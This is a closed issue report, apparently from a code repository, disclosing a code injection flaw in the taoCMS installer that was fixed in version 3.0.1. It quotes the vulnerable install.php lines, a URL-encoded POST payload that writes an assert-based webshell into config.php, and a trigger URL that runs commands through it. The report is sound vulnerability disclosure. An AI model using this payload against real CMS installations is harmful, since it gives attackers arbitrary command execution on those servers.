Closed jadacheng closed 3 years ago
In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: ./install.php:234-238
$configs=file_get_contents('config.php'); $_POST['tb']&&$configs=str_replace('define(\'TB\', \''.TB.'\');','define(\'TB\', \''.$_POST['tb'].'\');',$configs); $_POST['db']&&$configs=str_replace('define(\'DB\', \''.DB.'\');','define(\'DB\', \''.$_POST['db'].'\');',$configs); $_POST['db_name']&&$configs=str_replace('define(\'DB_NAME\', \''.DB_NAME.'\');','define(\'DB_NAME\', \''.$_POST['db_name'].'\');',$configs); file_put_contents('config.php',$configs);
payload:
/taocms-master/install.php [POST]db=Mysql&db_name=%7C127.0.0.1%3A3306%7Croot%7Croot%7Cwity%7C');assert($_REQUEST['cmd']);//&tb=test&Submit=%E7%82%B9%E5%87%BB%E6%AD%A4%E5%A4%84%E5%BC%80%E5%A7%8B%E5%AE%89%E8%A3%85%E5%85%8D%E8%B4%B9%E5%BC%80%E6%BA%90%E7%9A%84taoCMS%E7%B3%BB%E7%BB%9F
exploit: http://127.0.0.1/taocms-master/config.php?cmd=phpinfo();
3.0.1 fixed, thanks for your contrubution
In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: ./install.php:234-238
payload:
/taocms-master/install.php [POST]db=Mysql&db_name=%7C127.0.0.1%3A3306%7Croot%7Croot%7Cwity%7C');assert($_REQUEST['cmd']);//&tb=test&Submit=%E7%82%B9%E5%87%BB%E6%AD%A4%E5%A4%84%E5%BC%80%E5%A7%8B%E5%AE%89%E8%A3%85%E5%85%8D%E8%B4%B9%E5%BC%80%E6%BA%90%E7%9A%84taoCMS%E7%B3%BB%E7%BB%9F
exploit: http://127.0.0.1/taocms-master/config.php?cmd=phpinfo();